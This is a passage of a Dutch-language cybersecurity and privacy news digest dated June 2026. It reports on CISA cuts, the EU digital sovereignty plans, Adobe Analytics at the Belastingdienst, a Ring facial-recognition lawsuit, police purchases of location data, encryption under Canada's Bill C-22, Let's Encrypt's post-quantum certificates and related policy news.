Tijdens de tweede regering-Trump heeft CISA ongeveer een derde van zijn personeelsbestand verloren en is het budget van 3 miljard dollar drastisch verlaagd. Dit volgde op jarenlange klachten van Republikeinen dat de inspanningen van het agentschap om online desinformatie tijdens verkiezingen te bestrijden, conservatieve stemmen viseerden en inbreuk maakten op het recht op vrije meningsuiting. Het begrotingsvoorstel van president Trump voor fiscaal 2027 zou nog eens ruim 700 miljoen dollar van het agentschap afsnoeien, wat tot tweeledige bezorgdheid in het Congres heeft geleid.
Andrew Garbarino (R-NY), voorzitter van de Huiscommissie voor Binnenlandse Veiligheid, merkte tijdens een hoorzitting op dat CISA de afgelopen achttien maanden een aanzienlijke vermindering van het totale personeelsbestand heeft gezien, inclusief vrijwillige vertrekken, gedwongen ontslagen en herplaatsingen van personeel voor cyberbeveiliging. Hij uitte zijn zorgen dat enkele voorstellen in het begrotingsverzoek, zoals bezuinigingen op personeel en onderwijsprogramma's voor cyberbeveiliging die essentieel zijn voor het opleiden van geschoolde professionals in de Verenigde Staten, een negatief effect kunnen hebben op de inspanningen.
In zijn eerste optreden voor de commissie sinds zijn bevestiging in maart, stelde Mullin dat CISA waarschijnlijk ongeveer 2.800 werknemers nodig heeft, hoewel het de capaciteit heeft om tot 3.400 mensen in dienst te nemen. Momenteel heeft CISA ongeveer 2.200 personeelsleden. Mullin benadrukte de urgentie: "We zullen niet falen in de missie die voor ons ligt. Cyberaanvallen worden alleen maar sterker en richten zich het meest op onze private partners."
Mullin liet doorschemeren dat het Witte Huis binnenkort een kandidaat zal aankondigen om de cyberafdeling van het departement te leiden. Deze functie is onbezet geweest door een door de Senaat bevestigde leider sinds president Trump opnieuw aantrad. Een eerdere kandidaat trok zich in april terug. Mullin verklaarde: "We hebben een persoon die binnenkort wordt genomineerd en CISA zal leiden, die de mogelijkheid heeft om te werven en zich te richten op de bevoegdheden die we hebben. We willen dat CISA de leider is op het gebied van cyberbeveiliging. Dat moeten ze zijn en dat zullen ze zijn."
Verder werd Mullin gevraagd waarom het ministerie van Financiën werd aangewezen als het centrale punt voor de afhandeling van kwetsbaarheden in het executive order over artificiële intelligentie dat Trump dinsdag ondertekende, terwijl het Congres CISA bedoelde als de leidende federale entiteit in samenwerking met de private sector. Mullin antwoordde dat de grootste dreigingen waarvoor artificiële intelligentie wordt gebruikt, verband houden met financieel gewin. Hij voegde eraan toe dat hij regelmatig spreekt met minister van Financiën Scott Bessent en dat er comfort is met zijn leiding op dit gebied, gezien de samenwerking met CISA en de unieke autoriteit. Mullin concludeerde dat door de coördinatie de voorbereiding beter is dan wanneer het alleen binnen het Department of Homeland Security zou blijven.
Bron: recordedfuture.com
04 juni 2026 | Brussel presenteert plan voor digitale soevereiniteit Europa
De Europese Commissie heeft een omvangrijk plan onthuld dat tot doel heeft Europa digitaal soeverein te maken. Dit initiatief, onderdeel van het 'Technological Sovereignty Package', omvat aanzienlijke investeringen in cruciale technologieën zoals halfgeleiders, kunstmatige intelligentie (AI), cloudoplossingen en open source. Tegelijkertijd zal er nieuw beleid worden ontwikkeld om deze sectoren te reguleren en te ondersteunen.
Volgens de Europese Commissie is het van essentieel belang dat Europa onafhankelijk wordt op deze strategische technologische gebieden. De Commissie benadrukt dat Europese burgers het recht hebben op een veilige en betrouwbare digitale omgeving waarin hun gegevens worden opgeslagen, met duidelijke garanties tegen ongewenste uitwisseling. Door structurele afhankelijkheden te verminderen en Europa in staat te stellen de technologieën te ontwikkelen, uit te rollen en te beveiligen waarop Europeanen dagelijks vertrouwen, wordt een veiligere en betrouwbaardere toekomst voor de regio gebouwd.
Een van de speerpunten van het vandaag gepresenteerde pakket is de Europese Opensourcestrategie. Deze strategie heeft meerdere doelen: het aanmoedigen van het gebruik van bestaande open source oplossingen binnen zowel de publieke als de private sectoren, het ondersteunen van Europese organisaties bij het actief bijdragen aan de ontwikkeling van open source, inclusief alternatieven voor Amerikaanse software, en het algeheel versterken van het Europese open source ecosysteem.
De concrete wetsvoorstellen die voortvloeien uit dit pakket zullen nu het onderwerp zijn van onderhandelingen tussen de Europese Commissie, het Europees Parlement en de lidstaten. Dit proces zal de komende periode in beslag nemen, waarna de plannen definitief kunnen worden geïmplementeerd.
Bron: Europese Commissie | Bron 2: ec.europa.eu
04 juni 2026 | Kamer wil opheldering over Adobe Analytics bij Belastingdienst
De Tweede Kamer heeft dringende vragen gesteld aan staatssecretarissen Eerenberg van Financiën en Aerdts voor Digitale Economie over het gebruik van Adobe Analytics binnen de betaalomgeving van de Belastingdienst. Aanleiding voor deze Kamervragen, ingediend door JA21-Kamerlid Joost van den Berg, is een eerder verschenen artikel dat details gaf over de informatie die Adobe zou ontvangen van mensen die hun belasting betalen via de diensten van de Belastingdienst. Specifiek zou het hierbij gaan om details zoals de aard van de vordering en de geopende aanslag.
Kamerlid Van den Berg heeft de staatssecretarissen specifiek gevraagd of het klopt dat binnen "Mijn Belastingdienst", na succesvolle inlog met DigiD, gegevens worden verzonden naar `adobe-analytics-dc.belastingdienst.nl` bij het openen van een aanslag en het starten of annuleren van een betaling via iDEAL of Wero. Hij benadrukt daarbij dat dit domein technisch doorverwijst naar de infrastructuur van Adobe, waaronder `data.adobedc.net`. Deze technische koppeling roept vragen op over de reikwijdte van de gegevensuitwisseling.
Een cruciaal punt van de Kamervragen betreft de aard van de verzonden gegevens. De staatssecretarissen Eerenberg en Aerdts moeten duidelijk maken of het is uitgesloten dat een reeks gevoelige data, waaronder bedragen, Burgerservicenummer (BSN), IBAN-nummers, betalingskenmerken, aanslagnummers, vorderingsidentificaties, claim-identifiers, IP-adressen, sessiegegevens, referrers of andere direct of indirect herleidbare gegevens, wordt verstrekt aan Adobe of aan systemen die aan Adobe zijn gelieerd.
Verder wil Van den Berg weten welke juridische grondslag er bestaat onder de Algemene Verordening Gegevensbescherming (AVG) voor het meten van dit betaalgedrag binnen een verplichte overheidsdienst, die bovendien toegankelijk is via een DigiD inlog. Hierbij moeten de staatssecretarissen een grondige beoordeling geven van de noodzakelijkheid, proportionaliteit en subsidiariteit van dergelijke gegevensverwerking. Dit zijn kernprincipes binnen de AVG die bepalen of gegevensverwerking rechtmatig is.
Als laatste element van de Kamervragen wordt verzocht om een onderzoek in te stellen naar de praktijk van het verzenden van betaalflowgegevens aan Adobe Analytics. Zolang de rechtmatigheid en proportionaliteit van deze gegevensverstrekking niet overtuigend zijn vastgesteld, wordt er bij de staatssecretarissen aangedrongen op een tijdelijke stopzetting van deze activiteit. De Tweede Kamer heeft tevens geëist dat zij binnen twee weken een gedetailleerde tijdlijn, een technische analyse van de gegevensstromen, een Data Protection Impact Assessment (DPIA), de betreffende verwerkersovereenkomst en alle relevante beslisnota’s ontvangen. De staatssecretarissen hebben vervolgens drie weken de tijd om met een officiële reactie op alle gestelde Kamervragen te komen.
Bron: Belastingdienst
04 juni 2026 | Ring aangeklaagd in VS over gezichtsherkenning in deurbelcamera's
Deurbelcamerafabrikant Ring is in de Verenigde Staten voor de rechter gedaagd door een man die beweert dat het bedrijf gezichtsherkenningstechnologie heeft gebruikt om afbeeldingen van zijn gezicht op te nemen en te bewaren, zonder hiervoor zijn toestemming te verkrijgen. De aanklacht richt zich specifiek op de "Familiar Faces" functie van Ring. Deze optie stelt Ring-gebruikers in staat om personen te taggen, waarna de camera deze bekende gezichten in de toekomst kan herkennen. Wanneer de functie is ingeschakeld, scant de deurbelcamera de gezichten van alle voorbijgangers om de vooraf getagde bekenden te identificeren.
Volgens de klager is er geen toestemming verkregen van mensen wier gezichten door Ring-camera's worden gescand en van wie een 'faceprint' wordt opgeslagen. Dit zou een schending vormen van de privacyrechten van deze personen. De aanklacht stelt dat "Ring bij deze ingangen technologie blijft uitrollen voor massasurveillance, zonder dat het hiervoor toestemming heeft." Met 'ingangen' bedoelt de klager zowel woningen als bedrijven die de deurbelcamera's gebruiken. Tevens beweert de klager dat Ring zich onrechtmatig heeft verrijkt door het gebruik en de opslag van biometrische data, aangezien de verkoop van de camera's toeneemt als gevolg van de "Familiar Faces" functie. De klager eist een schadevergoeding van minimaal vijf miljoen dollar.
De Amerikaanse senator Edward Markey uitte eerder al kritiek op de functie, die hij omschreef als een "privacynachtmerrie". De senator waarschuwde dat de toevoeging van gezichtsherkenning aan deurbelcamera's een significante stap is richting een dystopische toekomst, waarin Amerikaanse burgers hun huis niet kunnen verlaten zonder te worden gevolgd en gesurveilleerd. Hij merkte op dat door de introductie van deze functie rond de feestdagen, Amazon bezorgers, inclusief de eigen chauffeurs, dwingt hun biometrische data af te staan bij elke pakketbezorging. Markey noemde deze uitbreiding van gezichtsherkenningstechnologie "roekeloos" en een "privacycrisis". Vanwege de gevoeligheid van de functie besloot Ring deze niet beschikbaar te maken in Amerikaanse staten met strenge biometrische wetgeving.
Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo
04 juni 2026 | Duitse politie kocht commerciële locatiegegevens voor tracking zonder bevel
Duitse politie heeft commerciële locatiegegevens aangekocht die afkomstig zijn van telefoonapplicaties en door databrokers zijn doorverkocht. Deze gegevens werden gebruikt om telefoons te volgen zonder de noodzaak van een gerechtelijk bevel. Een recent onderzoek heeft bevestigd dat ten minste twee deelstaat-recherchebureaus deze praktijk hebben toegepast.
Deze methode, waarbij gevoelige locatiegegevens van burgers worden verkregen via commerciële kanalen buiten de traditionele juridische procedures om, heeft tot aanzienlijke bezorgdheid geleid. Experts op het gebied van privacy en recht stellen dat de aankoop van dergelijke gegevens zonder een gerechtelijk bevel waarschijnlijk onwettig is. Het omzeilen van de wettelijke vereisten voor het verkrijgen van locatiegegevens roept fundamentele vragen op over de bescherming van burgerrechten en de grenzen van politionele bevoegdheden.
De betreffende commerciële locatiegegevens worden doorgaans verzameld via diverse apps die gebruikers op hun smartphones installeren. Deze apps vragen vaak om toegang tot locatiegegevens voor functionaliteit, waarna de verzamelde data geanonimiseerd of gepseudonimiseerd wordt doorverkocht aan databrokers. Databrokers bundelen en verrijken deze datasets, waarna ze deze aan diverse afnemers, waaronder in dit geval overheidsinstanties, aanbieden. Hoewel de gegevens mogelijk niet direct identificeerbaar zijn, kan de combinatie van datasets in veel gevallen leiden tot de-anonimisering van individuen.
Als reactie op de onthullingen heeft een gegevensbeschermingsautoriteit in Duitsland een onderzoek ingesteld naar de praktijken van de politie. Dit onderzoek zal moeten uitwijzen in hoeverre de aankoop en het gebruik van deze commerciële locatiegegevens stroken met de geldende privacywetgeving, zoals de Algemene Verordening Gegevensbescherming (AVG) binnen de Europese Unie, en de nationale wetgeving inzake gegevensbescherming. De uitkomst hiervan kan verstrekkende gevolgen hebben voor de manier waarop wetshandhavingsinstanties in de toekomst met digitale gegevens omgaan en zal mogelijk leiden tot strengere regulering van de databroker-industrie.
Bron: Cybercrimeinfo
04 juni 2026 | Canadese veiligheidswet bedreigt encryptie; techreuzen dringen aan op aanpassingen
Apple en Google voeren druk uit op de Canadese overheid om wetsvoorstel Bill C-22, een nieuwe wet inzake online veiligheid, aan te passen. Deze wet, die momenteel in het Canadese parlement wordt besproken, kan volgens de technologiebedrijven de beveiliging van versleutelde communicatie ondermijnen. Ook Meta heeft zich bij deze zorgen aangesloten.
Het voornaamste punt van zorg is dat de wet politie- en veiligheidsdiensten meer toegang zou kunnen geven tot versleutelde gegevens. Hoewel het wetsvoorstel geen expliciete eis bevat voor het inbouwen van "achterdeurtjes" (backdoors), vrezen de bedrijven dat de overheid hen via geheime bevelen kan dwingen om encryptie te verzwakken.
Bij end-to-end encryptie, een standaard voor veel communicatiediensten, kunnen alleen de verzender en ontvanger berichten lezen. Zelfs het bedrijf dat de dienst aanbiedt, heeft geen toegang tot de inhoud. Apple benadrukt dat het daarom technisch onmogelijk is om gegevens van gebruikers zomaar te overhandigen zonder de onderliggende beveiliging fundamenteel aan te passen.
Google heeft tijdens een hoorzitting gewaarschuwd dat geheime overheidsbevelen in strijd zijn met democratische transparantie. Apple verwees impliciet naar eerdere conflicten met het Verenigd Koninkrijk. Daar heeft het bedrijf bepaalde functies van iCloud verwijderd nadat de Britse autoriteiten toegang tot versleutelde data eisten. Erik Neuenschwander, directeur bij Apple, wilde niet bevestigen of Apple zich uit Canada zou terugtrekken als het bedrijf gedwongen wordt encryptie te verzwakken, maar sprak wel de hoop uit dat het parlement het wetsvoorstel nog zal aanpassen.
Organisaties die zich richten op privacy en veel gebruikers van het internet, die kritisch staan tegenover de wet, vrezen dat verplichte achterdeuren uiteindelijk ook misbruikt kunnen worden door kwaadwillende hackers of buitenlandse staten. Op platforms zoals Reddit en binnen gemeenschappen die zich richten op privacy wordt Bill C-22 daarom regelmatig vergeleken met omstreden wetgeving in het Verenigd Koninkrijk en Australië, landen die eveneens pogingen hebben gedaan om toegang tot versleutelde communicatie te forceren. De discussie benadrukt de wereldwijde spanning tussen de behoeften van de overheid aan inlichtingen en het recht op privacy en digitale veiligheid van burgers.
Bron: appleinsider.com
04 juni 2026 | Staatssecretaris: niet alle AI-systemen hoeven vooraf te worden getest
Staatssecretaris Aerdts, verantwoordelijk voor Digitale Economie, heeft aangegeven dat niet alle systemen die gebruikmaken van kunstmatige intelligentie (AI) voorafgaand aan hun inzet getest hoeven te worden. Dit standpunt werd door de staatssecretaris naar voren gebracht tijdens een vragenuur in de Tweede Kamer. Hierin reageerde zij op zorgen van het CDA over rapporten die suggereren dat AI modellen op grote schaal de wet overtreden.
De staatssecretaris benadrukte de inzet van het kabinet voor een verantwoorde implementatie van AI. Ze uitte haar bezorgdheid over de mogelijkheid om AI modellen opdrachten te geven die in strijd zijn met de AI-verordening of andere wetgeving. Dergelijke overtredingen ondermijnen niet alleen de waarde van de AI-uitkomsten, maar schaden ook het vertrouwen van het publiek in AI-technologie.
De AI-verordening, die de regels voor AI-systemen vaststelt, is reeds gedeeltelijk van kracht. Specifieke praktijken, zoals misleiding of manipulatie door AI, zijn op dit moment al verboden. Aerdts erkende dat wetgeving inherent achterloopt op technologische ontwikkelingen, wat vooral bij AI een uitdaging vormt. Een cruciaal aspect dat nog ontbreekt in Nederland is de aanwijzing van toezichthouders in het kader van deze verordening, wat volgens de staatssecretaris leidt tot een juridisch vacuüm.
CDA-Kamerlid Zwinkels stelde vragen over de juridische aansprakelijkheid wanneer een autonome AI-agent de wet overtreedt. De staatssecretaris legde uit dat de verantwoordelijkheid in principe ligt bij de ontwikkelaars van AI-taalmodellen voor de wijze waarop zij hun modellen configureren. Daarnaast dragen gebruikers ook een verantwoordelijkheid voor de aard van de vragen die zij aan de systemen stellen. Echter, Aerdts erkende dat deze verantwoordelijkheid niet volledig bij de gebruikers kan liggen en dat de AI-verordening voorschrijft dat bedrijven gebruikersinstructies moeten verstrekken. Het specifieke juridische vraagstuk van volledige aansprakelijkheid wordt momenteel nog in Europees verband besproken.
Wat betreft het testen van AI-systemen merkte Aerdts op dat dit een risicogestuurde aanpak volgt, vergelijkbaar met de werkwijze van de Nederlandse Voedsel- en Warenautoriteit (NVWA). Alleen AI-systemen met een hoog risico moeten voorafgaand aan de inzet worden getest. De staatssecretaris wees erop dat het niet haalbaar is om alle systemen te testen, mede gezien de behoefte aan innovatie. Een eenvoudig AI-systeem, zoals een geavanceerde Excel-sheet, zou bijvoorbeeld niet vooraf getest hoeven te worden.
De eerste regels van de AI-verordening zijn in Nederland sinds 2 februari vorig jaar van kracht, en de gehele wet zal op 2 augustus 2027 van toepassing zijn. De Autoriteit Persoonsgegevens heeft vorig jaar augustus al geconstateerd dat de aanwijzing van toezichthouders voor de naleving van de AI-verordening destijds al had moeten plaatsvinden.
Bron: Tweede Kamer
04 juni 2026 | Aangeboden database van Christelijke Mutualiteit is een valse claim
Eind mei verscheen op een cybercrimeforum een advertentie waarin een zogenaamde database van de Christelijke Mutualiteit werd aangeboden, het grootste ziekenfonds van België. Cybercrimeinfo bracht deze melding op 29 mei nadrukkelijk als onbevestigde claim, omdat de gegevens op dat moment niet te verifiëren waren.
Inmiddels is er rechtstreeks contact geweest met de Christelijke Mutualiteit. De securityafdeling van CM heeft de claim zelf onderzocht en bevestigt rechtstreeks aan Cybercrimeinfo dat het om een valse claim gaat. Concreet stelt CM vast dat de in de advertentie vermelde domeinnaam foutief is, en dat de gepubliceerde voorbeeldgegevens niet overeenkomen met de werkelijke data van de organisatie. Op basis van die vaststellingen moet de claim als fake worden beschouwd.
Ook de eigen analyse van Cybercrimeinfo wijst die kant op. Het opgegeven webadres komt niet overeen met de echte domeinen van de organisatie, de aangeboden data bestaat enkel uit algemene Engelstalige kolomnamen zonder echte voorbeeldgegevens, en de opbouw lijkt eerder op een algemeen commercieel klantenbestand dan op de gegevens van een Belgisch ziekenfonds.
Cybercrimeinfo meldt dit soort claims bewust, ook als ze nog niet bevestigd zijn. Door wat op het darkweb circuleert zichtbaar te maken, krijgen organisaties de kans om snel te controleren en waar nodig in te grijpen. Lang niet elke claim is vals, en juist door er vroeg melding van te maken is in het verleden meermaals schade voorkomen. Blijkt een claim ongegrond, zoals hier, dan corrigeren we dat even duidelijk.
Wel blijft voorzichtigheid op zijn plaats. Rond dezelfde periode circuleren er phishingberichten die de naam van de Christelijke Mutualiteit misbruiken. Ontvang je een bericht dat om je accountgegevens vraagt, klik dan niet op de link en ga rechtstreeks naar de officiële website van je ziekenfonds.
Bron: Cybercrimeinfo
05 juni 2026 | Let's Encrypt introduceert Merkle Tree Certificates voor kwantumveilige webauthenticatie
Let's Encrypt heeft zijn roadmap voor post-kwantum Web PKI onthuld, met een focus op Merkle Tree Certificates (MTCs). Dit nieuwe ontwerp moet kwantum-resistente authenticatie leveren zonder de omvang van TLS-handshakes te vergroten of de prestaties van het web te beïnvloeden.
Traditionele X.509 certificaatketens vereisen aanzienlijke bandbreedte, wat exponentieel zou toenemen bij de adoptie van robuuste post-kwantum algoritmen. MTCs adresseren dit probleem door de zware, geserialiseerde keten van handtekeningen te vervangen door compacte Merkle Tree proofs. Eerder dit jaar introduceerde Google al Merkle Tree Certificates als een manier om HTTPS te beschermen tegen kwantumdreigingen, waarbij Chrome een voortrekkersrol speelt in de overgang naar MTCs.
Jarenlang lag de prioriteit in discussies over post-kwantum cryptografie op encryptie boven authenticatie. De gedachte was dat "harvest now, decrypt later"-aanvallen versleuteld verkeer onmiddellijk kwetsbaar maken, terwijl het vervalsen van authenticatiehandtekeningen een live Cryptographically Relevant Quantum Computer (CRQC) vereist. Deze marge van veiligheid slinkt echter snel.
Diverse instanties hebben al deadlines gesteld voor de migratie naar post-kwantum algoritmen. De CNSA 2.0 suite van de NSA verplicht nationale veiligheidssystemen om tegen 2030-2035 te migreren. De conceptrichtlijnen van NIST (IR 8547) bepalen dat RSA-2048 en P-256 na 2030 worden afgekeurd en na 2035 niet meer zijn toegestaan. De post-kwantum roadmap van de EU richt zich op hoge-risicosystemen tegen eind 2030. Google kondigde een migratiedeadline van 2029 aan voor zijn diensten, en Cloudflare heeft een soortgelijke toezegging gedaan. Bovendien heeft Go 1.27 ML-DSA, een door NIST gestandaardiseerd post-kwantum handtekeningschema, direct toegevoegd aan zijn standaardbibliotheek, wat duidt op de gereedheid van de infrastructuur.
De schaal van Web PKI maakt een naïeve post-kwantum migratie ingewikkeld. ML-DSA-44, een van NIST's kleinere gestandaardiseerde schema's, produceert handtekeningen van ongeveer 2.420 bytes, wat bijna 38 keer groter is dan de 64 bytes van ECDSA-P256. Een typische TLS-handshake bevat vijf handtekeningen en twee publieke sleutels. Het vervangen hiervan door ML-DSA-equivalenten zou een enkele handshake ver boven de 10 KB duwen. Onderzoek van Cloudflare bevestigt de gevolgen: bij die schaal zou een aanzienlijk deel van de real-world TLS-verbindingen volledig falen, en de rest zou vertragen. Het degraderen van elke TLS-verbinding wereldwijd is een te grote concessie voor een dreiging die nog niet is gematerialiseerd.
MTCs herdefiniëren de manier waarop certificaten worden uitgegeven en geverifieerd. In plaats van elk certificaat afzonderlijk te ondertekenen, geeft een Certificate Authority (CA) certificaten in batches uit, met een enkele post-kwantum handtekening die de hele batch dekt. Clients, zoals browsers, onderhouden deze batchhandtekeningen, ook wel 'landmarks' genoemd, onafhankelijk van de TLS-handshake. Het resultaat is dat een MTC-handshake slechts één handtekening, één publieke sleutel en één 'inclusion proof' bevat die kleiner is dan de huidige Web PKI-handshake, zelfs bij gebruik van post-kwantum algoritmen.
MTCs integreren ook Certificate Transparency (CT) van nature. Elk certificaat maakt deel uit van een gepubliceerde Merkle tree, waardoor transparantie intrinsiek is aan de uitgifte in plaats van achteraf toegevoegd. Let's Encrypt beheert al sinds 2019 CT logs die gebouwd zijn op Merkle trees, wat het bedrijf directe operationele ervaring geeft met de kern datastructuur.
Het MTC-ecosysteem is al in beweging: Cloudflare en Chrome voeren een live MTC-haalbaarheidsexperiment uit met echt internetverkeer, de IETF PLANTS-werkgroep standaardiseert actief het ontwerp, en Chrome heeft MTCs uitgeroepen tot zijn voorkeursroute voor post-kwantum certificaten op het publieke web. Let's Encrypt streeft naar een staging MTC-omgeving eind 2026 en een productieklare omgeving in 2027. Deze uitrol vereist grote veranderingen in de uitgifte-infrastructuur, het ACME-protocol (RFC 9881), de intrekkingstools en de CT log-infrastructuur.
Voor bestaande abonnees verandert er vandaag niets; certificaten zullen via ACME precies zoals voorheen worden uitgegeven. ACME clientbeheerders moeten echter nu al de PLANTS-werkgroep en de mtcs@chromium.org mailinglijst volgen, aangezien client-side wijzigingen nodig zullen zijn. Voor serveroperators blijft de meest urgente actie vandaag het inschakelen van hybride post-kwantum sleuteluitwisseling (X25519MLKEM768), de primaire verdediging tegen "harvest now, decrypt later"-aanvallen op versleuteld verkeer.
Bron: Flare | Bron 2: nsa.gov | Bron 3: blog.google
05 juni 2026 | Nieuwe beheerder DigiD moet Europees zijn
Staatssecretaris Eric van der Burg van Binnenlandse Zaken heeft de Tweede Kamer geïnformeerd over een significante beleidswijziging met betrekking tot het beheer van DigiD. In een recente brief aan de Kamer heeft de staatssecretaris expliciet gesteld dat de toekomstige beheerder van een deel van de dienstverlening van DigiD van Europese origine moet zijn. Deze nieuwe voorwaarde zal van kracht worden voor het contract dat na augustus 2028 van start gaat.
De procedure voor de aanbesteding van dit contract zal niet volgens de standaard regels voor aanbestedingen verlopen. In plaats daarvan zal de Aanbestedingswet Defensie en Veiligheid (ADV) worden toegepast. Dit houdt in dat de selectie van de betreffende onderneming zal plaatsvinden onder de strikte richtlijnen en vereisten die kenmerkend zijn voor aanbestedingen op het gebied van defensie en veiligheid. De brief van de staatssecretaris aan de Tweede Kamer dient als officiële aankondiging van deze beleidswijziging, waarmee de contouren van de toekomstige invulling van het beheer van DigiD worden geschetst.
Bron: Tweede Kamer
05 juni 2026 | FTC overweegt wijziging boete van $150 miljoen voor X (voorheen Twitter)
De Federal Trade Commission (FTC) heeft woensdag aangekondigd dat het overweegt een schikkingsbesluit uit 2022 te wijzigen of terzijde te schuiven. Dit besluit werd destijds opgelegd aan Twitter, nu bekend als X, vanwege het gebruik van accountbeveiligingsgegevens om gerichte advertenties te ondersteunen.
X heeft een verzoek ingediend waarin wordt gesteld dat de schikkingsvoorwaarden onredelijk zijn, omdat het besluit werd uitgevaardigd tegen een bedrijf dat "niet langer bestaat". Daarnaast beargumenteert X dat de werknemers die verantwoordelijk waren voor de betreffende praktijken niet langer in dienst zijn bij het bedrijf, en dat de onderneming sindsdien een "wereldwijd toonaangevend" programma voor privacy en gegevensbescherming heeft opgezet. Dit blijkt uit een oproep van de FTC voor publieke commentaar.
Het technologiebedrijf kreeg in 2022 een boete van $150 miljoen en het werd verboden om langer te profiteren van wat de FTC destijds omschreef als "misleidend verzamelde gegevens". Twitter kwam in oktober 2022 onder nieuw eigenaarschap toen Elon Musk het bedrijf kocht.
X beargumenteert verder dat het besluit "geen geldig regulerend doel meer dient, en miljoenen dollars aan onnodige kosten met zich meebrengt om te voldoen aan verplichtingen en beschermingen die al worden vereist door binnenlandse en internationale privacyregimes en door de industrie erkende raamwerken die X Corp. volgt". Het technologiebedrijf stelt dat het terzijde schuiven van het besluit in overeenstemming is met de principes van het Eerste Amendement en "cruciaal is voor het bevorderen van Amerikaans leiderschap op het gebied van kunstmatige intelligentie".
De FTC heeft het publiek uitgenodigd om commentaar te leveren op de vraag of het besluit moet worden gewijzigd of terzijde geschoven. De periode voor publieke commentaar eindigt op 2 juli, waarna het agentschap zal beslissen of het doorgaat met wijzigingen.
Het schikkingsbesluit van mei 2022 beweerde dat Twitter gebruikers aanmoedigde om hun telefoonnummers en e-mailadressen op te geven om hun accounts te beveiligen, maar de gegevens vervolgens verkocht aan adverteerders die gerichte advertenties aan specifieke consumenten wilden tonen, waarmee grote winsten werden behaald. De FTC stelde dat de acties van Twitter een overtreding waren van een besluit uit 2011, dat het bedrijf verbood het publiek te misleiden over zijn privacy- en beveiligingspraktijken.
FTC-voorzitter Lina Khan verklaarde destijds: "Twitter verkreeg gegevens van gebruikers onder het voorwendsel deze te gebruiken voor beveiligingsdoeleinden, maar gebruikte de gegevens vervolgens ook om gebruikers met advertenties te bestoken. Deze praktijk trof meer dan 140 miljoen Twitter-gebruikers, terwijl het de belangrijkste inkomstenbron van Twitter stimuleerde."
Bron: FTC | Bron 2: recordedfuture.com
05 juni 2026 | CISA kondigt richtlijn aan voor AI executive order met focus op kwetsbaarheidsbeheer
De Cybersecurity and Infrastructure Security Agency (CISA) is van plan om deze week een bindende operationele richtlijn uit te brengen voor federale agentschappen. Deze richtlijn zal de vereiste acties specificeren om de presidentiële executive order over kunstmatige intelligentie (AI) uit te voeren. Dit maakte CISA’s waarnemend directeur Nick Andersen bekend tijdens de TechNet Cyber conferentie in Baltimore.
Een belangrijk onderdeel van de richtlijn zal zich richten op het verminderen en beheren van kwetsbaarheden binnen de IT-infrastructuren van federale agentschappen. Andersen benadrukte verder dat CISA in de komende dagen specifieke toegang tot AI-capaciteiten zal uitrollen naar zijn partners.
De executive order over AI, die eerder deze week werd vrijgegeven, is een aangepaste versie van een eerdere iteratie. Deze eerdere versie werd ingetrokken na interne conflicten binnen de Amerikaanse regering en zorgen geuit door voormalig AI- en cryptocoördinator David Sacks. De meest recente versie van de order vraagt bedrijven om vrijwillig hun AI modellen ter testen voor te leggen aan de overheid, dertig dagen voordat deze publiekelijk worden gelanceerd. Oorspronkelijk werd hiervoor een termijn van negentig dagen voorgesteld.
Andersen erkende de potentiële risico's die sommige AI modellen met zich meebrengen, maar legde ook de nadruk op de mogelijkheden van AI om cyberbeveiligingsmaatregelen te versterken. Hij stelde de vraag hoe AI effectief kan worden ingezet als een defensief instrument om de blootstelling aan het aanvalsoppervlak te verminderen.
CISA zal een cruciale rol spelen bij de oprichting van het door de executive order beoogde "cyber clearinghouse" en zal tevens AI modellen beoordelen en valideren. Andersen voegde eraan toe dat de overheid aanzienlijk werk moet verrichten om het toenemende dreigingslandschap aan te pakken. Hij bekritiseerde de huidige staat van de IT infrastructuur, waarbij veel apparaten het einde van hun levensduur hebben bereikt en beperkte service bieden. Dit maakt het voor tegenstanders te gemakkelijk om in te dringen.
Bron: recordedfuture.com
05 juni 2026 | Kabinet acht gebruik tracking cookies problematisch bij dark patterns en consentmoeheid
Het Nederlandse kabinet erkent dat het gebruik van tracking cookies in bepaalde situaties problematisch kan zijn. Dit geldt met name wanneer gebruikers toestemming geven als gevolg van misleidende ontwerpen (dark patterns), een overvloed aan informatie, of 'consentmoeheid', waardoor hun werkelijke voorkeuren mogelijk niet worden weerspiegeld. Deze standpuntbepaling volgt op vragen van de Tweede Kamer aan minister Hermans van Volksgezondheid, Welzijn en Sport.
De Kamervragen, gesteld door GroenLinks-PvdA Kamerleden Vliegenthart, Kathmann en Moorman, kwamen voort uit onderzoek dat aantoonde dat grote Nederlandse drogisterijketens, zoals Kruidvat, Etos en Trekpleister, mogelijk gevoelige informatie over de vruchtbaarheid en seksuele gezondheid van klanten delen met Amerikaanse en Chinese technologiebedrijven. De Kamerleden wilden weten wat het oordeel van de minister was over het gebruik van tracking cookies door online webshops, en of het delen van gevoelige koopgedragsinformatie mogelijk in strijd is met de privacywetgeving.
Minister Hermans bevestigde dat het kabinet de opvatting deelt dat tracking cookies onder bepaalde omstandigheden problematisch kunnen zijn. Zij benadrukte dat voor het plaatsen van dergelijke cookies door online webshops de Algemene Verordening Gegevensbescherming (AVG) en de e-privacyrichtlijn van kracht zijn. Dit betekent dat er een geïnformeerde en ondubbelzinnige toestemming van de gebruiker vereist is. Wanneer het gaat om gevoelige persoonsgegevens, geldt zelfs een versterkt en expliciet vereiste voor toestemming.
De minister liet weten dat de beoordeling van mogelijke strijdigheid met de privacyregelgeving de verantwoordelijkheid is van de toezichthouder, in dit geval de Autoriteit Persoonsgegevens. Daarnaast gaf Hermans aan dat het kabinet zich zowel nationaal als Europees inzet om de informatie- en toestemmingsrechten van burgers op het gebied van tracking cookies te versterken.
Bron: Politie | Bron 2: tweedekamer.nl
05 juni 2026 | eSIMs bieden betere bescherming tegen SIM-swaps en vereenvoudigen mobiele diensten
De fysieke SIM-kaart verliest snel aan terrein ten gunste van de eSIM-technologie, die een eenvoudigere en veiligere benadering biedt voor mobiele connectiviteit. Industriële prognoses verwachten dat eSIMs tegen 2030 het merendeel van de smartphoneverbindingen zullen uitmaken, wat de snelle verschuiving in de mobiele sector benadrukt.
